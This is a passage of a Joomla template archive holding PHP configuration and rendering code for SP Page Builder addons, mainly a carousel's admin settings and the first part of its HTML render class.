				'social_icon_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_SOCIAL_ICON_COLOR'),
					'std'=>'',
				),
				'social_icon_hover_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_SOCIAL_ICON_HOVER_COLOR'),
					'std'=>'',
				),
				'social_icon_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_SOCIAL_ICON_FONT_SIZE'),
					'max'=> 200,
					'std'=> ''
				),
				'social_icon_margin'=>array(
					'type'=>'margin',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_SOCIAL_ICON_MARGIN'),
					'responsive'=>true,
					'std'=> ''
				),
				'social_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_SOCIAL_ICONS_POSITION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_SOCIAL_ICONS_POSITION'),
					'depends'=>array(
						array('person_style_preset', '!=', 'layout3'),
					),
					'values'=>array(
						'before'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_BEFORE_INTROTEXT'),
						'after'=>JText::_('COM_SPPAGEBUILDER_ADDON_PERSON_AFTER_INTROTEXT'),
					),
					'std'=>'after',
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-left',
				),
				
				'background'=>array(
					'type'=>'color',
					'title'=>JText::_('FLEX_ADDON_PERSON_BACKGROUND'),
					'desc'=>JText::_('FLEX_ADDON_PERSON_BACKGROUND_DESC'),
					'depends'=>array(
						array('type', '!=', 'default'),
					),
					'std'=> '#fff'
					),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!1�o�G�G,flex/sppagebuilder/addons/carousel/admin.phpnu&1i�<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2016 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'repeatable',
		'addon_name'=>'sp_carousel',
		'category'=>'Slider',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_DESC'),
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'autoplay'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_AUTOPLAY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_AUTOPLAY_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1
				),
				
				'interval'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_INTERVAL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_INTERVAL_DESC'),
					'std'=> 5,
					'depends'=> array(
						array('autoplay', '=', 1),
					)
				),

				'speed'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_SPEED'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_SPEED_DESC'),
					'std'=> 600,
				),

				'controllers'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_SHOW_CONTROLLERS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_SHOW_CONTROLLERS_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
				),

				'arrows'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_SHOW_ARROWS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_SHOW_ARROWS_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
				),
				
				/*
				'items_padding'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_GLOBAL_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_GLOBAL_PADDING_DESC'),
					'placeholder'=>'60px',
					'std'=>''
				),
				*/

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

				//repeatable
				'sp_carousel_item'=>array(
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEMS'),
					'attr'=>  array(

						'title'=>array(
							'type'=>'text',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_DESC'),
							'std'=>'Carousel Item Title',
						),
						
						'heading_selector'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
							'values'=>array(
								'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
								'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
								'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
								'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
								'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
								'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
							),
							'std'=>'h2',
						),
						
						'title_font_family'=>array(
							'type'=>'fonts',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_FONT_FAMILY'),
							'depends'=>array(array('title', '!=', '')),
							'selector'=> array(
								'type'=>'font',
								'font'=>'{{ VALUE }}',
								'css'=>' h2 { font-family: "{{ VALUE }}"; }'
							)
						),

						'title_fontsize'=>array(
							'type'=>'slider',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_FONTSIZE'),
							'max'=>100,
							'std'=>array('md'=>46, 'sm'=>36, 'xs'=>16),
							'responsive' => true
						),

						'title_lineheight'=>array(
							'type'=>'slider',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_LINEHEIGHT'),
							'max'=>100,
							'std'=>array('md'=>56, 'sm'=>46, 'xs'=>20),
							'responsive' => true
						),

						'title_color'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_COLOR'),
							'std'=>'#fff',
						),

						'title_padding'=>array(
							'type'=>'padding',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_PADDING'),
							'std'=>array('md'=>'0px 0px 0px 0px', 'sm'=>'0px 0px 0px 0px', 'xs'=>'0px 0px 0px 0px'),
							'responsive' => true
						),

						'title_margin'=>array(
							'type'=>'margin',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_TITLE_MARGIN'),
							'std'=>array('md'=>'0px 0px 0px 0px', 'sm'=>'0px 0px 0px 0px', 'xs'=>'0px 0px 0px 0px'),
							'responsive' => true
						),							

						'content'=>array(
							'type'=>'editor',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_CONTENT'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_CONTENT_DESC'),
							'std'=> 'Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod. Brunch 3 wolf moon tempor, sunt aliqua put a bird on it squid single-origin coffee nulla assumenda shoreditch et.'
						),
						
						'content_font_family'=>array(
							'type'=>'fonts',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONT_FAMILY'),
							'depends'=>array(array('content', '!=', '')),
							'selector'=> array(
								'type'=>'font',
								'font'=>'{{ VALUE }}',
								'css'=>' .sppb-carousel-pro-text .sppb-carousel-content { font-family: "{{ VALUE }}"; }'
							)
						),

						'content_fontsize'=>array(
							'type'=>'slider',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_CONTENT_FONTSIZE'),
							'max'=>100,
							'std'=>array('md'=>16, 'sm'=>14, 'xs'=>12),
							'responsive' => true
						),

						'content_lineheight'=>array(
							'type'=>'slider',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_CONTENT_LINEHEIGHT'),
							'max'=>100,
							'std'=>array('md'=>24, 'sm'=>22, 'xs'=>16),
							'responsive' => true
						),

						'content_color'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_CONTENT_COLOR'),
							'std'=>'#fff',
						),

						'content_padding'=>array(
							'type'=>'padding',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_CONTENT_PADDING'),
							'std'=>array('md'=>'20px 0px 30px 0px', 'sm'=>'15px 0px 20px 0px', 'xs'=>'10px 0px 10px 0px'),
							'responsive' => true
						),

						'content_margin'=>array(
							'type'=>'margin',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_MARGIN'),
							'std'=>array('md'=>'0px 0px 0px 0px', 'sm'=>'0px 0px 0px 0px', 'xs'=>'0px 0px 0px 0px'),
							'responsive' => true
						),

						'bg'=>array(
							'type'=>'media',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_IMAGE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_IMAGE_DESC'),
							'format'=>'image',
							'std'=> array(
								'src' => 'https://sppagebuilder.com/addons/carousel/carousel-bg.jpg',
							)
						),

						/*
						'bg'=>array(
							'type'=>'media',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_BACKGROUND_IMAGE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_BACKGROUND_IMAGE_DESC'),
						),
						*/
						
						'background_color'=>array(
							'type'=>'color', 
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_BACKGROUND_COLOR'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_BACKGROUND_COLOR_DESC'),
						),
						
						'content_color'=>array(
							'type'=>'color', 
							'title'=>JText::_('FLEX_ADDON_CONTENT_TXT_COLOR'),
							'desc'=>JText::_('FLEX_ADDON_CONTENT_TXT_COLOR_DESC'),
						),

						//Button
						'button_text'=>array(
							'type'=>'text',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
							'std'=>'Button Text',
						),

						'button_font_family'=>array(
							'type'=>'fonts',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CAROUSEL_ITEM_BUTTON_FONT_FAMILY'),
							'depends'=>array(array('button_text', '!=', '')),
							'selector'=> array(
								'type'=>'font',
								'font'=>'{{ VALUE }}',
								'css'=>'.sppb-carousel-pro-text .sppb-btn { font-family: "{{ VALUE }}"; }'
							)
						),

						'button_font_style'=>array(
							'type'=>'fontstyle',
							'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_letterspace'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
							'values'=>array(
								'0'=> 'Default',
								'1px'=> '1px',
								'2px'=> '2px',
								'3px'=> '3px',
								'4px'=> '4px',
								'5px'=> '5px',
								'6px'=>	'6px',
								'7px'=>	'7px',
								'8px'=>	'8px',
								'9px'=>	'9px',
								'10px'=> '10px'
							),
							'std'=>'0',
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_url'=>array(
							'type'=>'media',
							'format'=>'attachment',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL_DESC'),
							'placeholder'=>'http://',
							'hide_preview'=>true,
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_target'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB_DESC'),
							'values'=>array(
								''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
								'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
							),
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),
						
						'button_type'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
							'values'=>array(
								'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
								'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
								'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
								'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
								'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
								'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
								'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
								'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
								'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
								'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
								'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
							),
							'std'=>'default',
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_appearance'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
							'values'=>array(
								''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
								'gradient'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
								'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
								'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
							),
							'std'=>'flat',
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_status'=>array(
							'type'=>'buttons',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
							'std'=>'normal',
							'values'=>array(
								array(
									'label' => 'Normal',
									'value' => 'normal'
								),
								array(
									'label' => 'Hover',
									'value' => 'hover'
								),
							),
							'tabs' => true,
							'depends'=>array(
								array('button_type', '=', 'custom'),
								array('button_text', '!=', ''),
							)
						),

						'button_background_color'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
							'std' => '#444444',
							'depends'=> array(
								array('button_appearance', '!=', 'gradient'),
								array('button_type', '=', 'custom'),
								array('button_status', '=', 'normal'),
								array('button_text', '!=', ''),
							)
						),

						'button_background_gradient'=>array(
							'type'=>'gradient',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
							'std'=> array(
								"color" => "#B4EC51",
								"color2" => "#429321",
								"deg" => "45",
								"type" => "linear"
							),
							'depends'=>array(
								array('button_appearance', '=', 'gradient'),
								array('button_type', '=', 'custom'),
								array('button_status', '=', 'normal'),
								array('button_text', '!=', ''),
							)
						),

						'button_color'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
							'std' => '#fff',
							'depends'=> array(
								array('button_type', '=', 'custom'),
								array('button_status', '=', 'normal'),
								array('button_text', '!=', ''),
							)
						),

						'button_background_color_hover'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
							'std' => '#222',
							'depends'=> array(
								array('button_appearance', '!=', 'gradient'),
								array('button_type', '=', 'custom'),
								array('button_status', '=', 'hover'),
								array('button_text', '!=', ''),
							)
						),

						'button_background_gradient_hover'=>array(
							'type'=>'gradient',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
							'std'=> array(
								"color" => "#429321",
								"color2" => "#B4EC51",
								"deg" => "45",
								"type" => "linear"
							),
							'depends'=>array(
								array('button_appearance', '=', 'gradient'),
								array('button_type', '=', 'custom'),
								array('button_status', '=', 'hover'),
								array('button_text', '!=', ''),
							)
						),

						'button_color_hover'=>array(
							'type'=>'color',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
							'std' => '#fff',
							'depends'=> array(
								array('button_type', '=', 'custom'),
								array('button_status', '=', 'hover'),
								array('button_text', '!=', ''),
							)
						),

						'button_size'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
							'values'=>array(
								''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
								'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
								'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
								'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
								'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
							),
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_shape'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
							'values'=>array(
								'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
								'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
								'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
							),
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_block'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
							'values'=>array(
								''=>JText::_('JNO'),
								'sppb-btn-block'=>JText::_('JYES'),
							),
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_icon'=>array(
							'type'=>'icon',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_DESC'),
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),

						'button_icon_position'=>array(
							'type'=>'select',
							'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
							'values'=>array(
								'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
								'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
							),
							'depends'=> array(
								array('button_text', '!=', ''),
							)
						),
					),
				),
			),
		),
	)
);
PK!���S����+flex/sppagebuilder/addons/carousel/site.phpnu&1i�<?php
/**
 * @package SP Page Builder
 * @author JoomShaper http://www.joomshaper.com
 * @copyright Copyright (c) 2010 - 2019 JoomShaper
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonCarousel extends SppagebuilderAddons {

	public function render() {
		
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? ' ' . $this->addon->settings->class : '';

		//Addons option
		$autoplay = (isset($this->addon->settings->autoplay) && $this->addon->settings->autoplay) ? ' data-sppb-ride="sppb-carousel"' : 0;
		$controllers = (isset($this->addon->settings->controllers) && $this->addon->settings->controllers) ? $this->addon->settings->controllers : 0;
		$arrows = (isset($this->addon->settings->arrows) && $this->addon->settings->arrows) ? $this->addon->settings->arrows : 0;
		$alignment = (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? $this->addon->settings->alignment : 0;
		//$items_padding = (isset($this->addon->settings->items_padding) && $this->addon->settings->items_padding) ? $this->addon->settings->items_padding : '';
		
		$interval = (isset($this->addon->settings->interval) && $this->addon->settings->interval) ? ((int) $this->addon->settings->interval * 1000) : 5000;
		
		//$sppbCarouselParam['items_padding'] = $items_padding;
		
		$carousel_autoplay = ($autoplay) ? ' data-sppb-ride="sppb-carousel"':'';

		$output  = '<div id="sppb-carousel-'. $this->addon->id .'" data-interval="'.$interval.'" class="sppb-carousel sppb-carousel-flex sppb-slide' . $class . '"'. $carousel_autoplay .'>';

		if($controllers) {
			$output .= '<ol class="sppb-carousel-indicators">';
				foreach ($this->addon->settings->sp_carousel_item as $key1 => $value) {
					$output .= '<li data-sppb-target="#sppb-carousel-'. $this->addon->id .'" '. (($key1 == 0) ? ' class="active"': '' ) .'  data-sppb-slide-to="'. $key1 .'"></li>' . "\n";
				}
			$output .= '</ol>';
		}

		$output .= '<div class="sppb-carousel-inner ' . $alignment . '">';

		foreach ($this->addon->settings->sp_carousel_item as $key => $value) {
			
			$heading_selector = (isset($value->heading_selector) && $value->heading_selector) ? $value->heading_selector : 'h2';
			$background_color = (isset($value->background_color) && $value->background_color) ? $value->background_color : '';
			$content_color = (isset($value->content_color) && $value->content_color) ? $value->content_color : '';
			$alt_text = isset($value->title) ? $value->title : '';
			$button_url = (isset($value->button_url) && $value->button_url) ? $value->button_url : '';
			$bg_image = (isset($value->bg) && $value->bg) ? $value->bg : '';
			$bg_image_src = isset($bg_image->src) ? $bg_image->src : $bg_image;
		
			/*
			if($bg_image_src) {
				$sppbCarouselParam['items_padding'] != '' ? $item_padding = 'padding:0;' : $item_padding = '';
			} else {
				$sppbCarouselParam['items_padding'] != '' ? $item_padding = 'padding:' .$sppbCarouselParam['items_padding']. ';' : $item_padding = 'padding:60px;';
			}
			*/
			
			if($background_color) {
				$background_color = 'background-color:' . $background_color . ';';
			}
			
			if($content_color) {
				$content_color = ' style="color:' . $content_color . ';"';
			}
			
			
			$title_fontsize = (isset($value->title_fontsize) && $value->title_fontsize) ? ' style="font-size: ' . $value->title_fontsize . 'px; line-height: ' . $value->title_fontsize . 'px;"' : '';


			//$output .= '<div style="' . $background_color . $item_padding .'" class="sppb-item'. (($bg_image_src) ? ' sppb-item-has-bg' : '') . (($key == 0) ? ' active' : '') .'">';
			$output .= '<div class="sppb-item sppb-item-'. $this->addon->id . $key . ' ' . ($bg_image_src ? ' sppb-item-has-bg' : '') . (($key == 0) ? ' active' : '') .'">';
			
			// Image
			if($bg_image_src) {
				
				if(strpos($bg_image_src, 'http://') !== false || strpos($bg_image_src, 'https://') !== false){
					// Lazyload for images with absolute URL
					if($has_lazyload) {
						$output .= '<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $bg_image_src .'" alt="'. $alt_text .'">';
					} else {
						$output  .= '<img src="' . $bg_image_src . '" alt="'. $alt_text .'" title="'.$alt_text.'">';	
					}
				} else {
					// Lazyload for images for relative URL (local image)
					if($has_lazyload) {
						$output .= '<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. JUri::root() . $bg_image_src .'" alt="'. $alt_text .'">';
					} else {
						$output  .= '<img src="' . $bg_image_src . '" alt="'. $alt_text .'" title="'.$alt_text.'">';	
					}
				}
			}
			$output  .= '<div class="sppb-carousel-item-inner">';
			$output  .= '<div class="sppb-carousel-caption">';
			$output  .= '<div'.$content_color.' class="sppb-carousel-text">';

			if((isset($value->title) && $value->title) || (isset($value->content) && $value->content) ) {
					$output  .= (isset($value->title) && $value->title) ? '<h2>' . $value->title . '</h2>' : '';
					$output  .= (isset($value->content) && $value->content) ? '<div class="sppb-carousel-content">' . $value->content . '</div>': '';
					if(isset($value->button_text) && $value->button_text) {
						$button_class = (isset($value->button_type) && $value->button_type) ? ' sppb-btn-' . $value->button_type : ' sppb-btn-default';
						$button_class .= (isset($value->button_size) && $value->button_size) ? ' sppb-btn-' . $value->button_size : '';
						$button_class .= (isset($value->button_shape) && $value->button_shape) ? ' sppb-btn-' . $value->button_shape: ' sppb-btn-rounded';
						$button_class .= (isset($value->button_appearance) && $value->button_appearance) ? ' sppb-btn-' . $value->button_appearance : '';
						$button_class .= (isset($value->button_block) && $value->button_block) ? ' ' . $value->button_block : '';
						$button_icon = (isset($value->button_icon) && $value->button_icon) ? $value->button_icon : '';
						$button_icon_position = (isset($value->button_icon_position) && $value->button_icon_position) ? $value->button_icon_position: 'left';
						$button_target = (isset($value->button_target) && $value->button_target) ? $value->button_target : '_self';
						
						$icon_arr = array_filter(explode(' ', $button_icon));
						if (count($icon_arr) === 1) {
							$button_icon = 'fa ' . $button_icon;
						}

						if($button_icon_position == 'left') {
							$value->button_text = ($button_icon) ? '<i aria-hidden="true" class="' . $button_icon . '" aria-hidden="true"></i> ' . $value->button_text : $value->button_text;
						} else {
							$value->button_text = ($button_icon) ? $value->button_text . ' <i aria-hidden="true" class="' . $button_icon . '" aria-hidden="true"></i>' : $value->button_text;
						}
	
						$output  .= '<a href="' . $button_url . '" target="' . $button_target . '" '.($button_target === '_blank' ? 'rel="noopener noreferrer"' : '').' id="btn-'. ($this->addon->id + $key) .'" class="sppb-btn'. $button_class .'">' . $value->button_text . '</a>';
					}
				}
			$output  .= '</div>';
			$output  .= '</div>';

			$output  .= '</div>';
			$output  .= '</div>';
		}

		$output	.= '</div>';

		if($arrows) {
			$output	.= '<a href="#sppb-carousel-'. $this->addon->id .'" class="sppb-carousel-arrow left sppb-carousel-control" data-slide="prev"><i class="fa fa-angle-left"></i></a>';
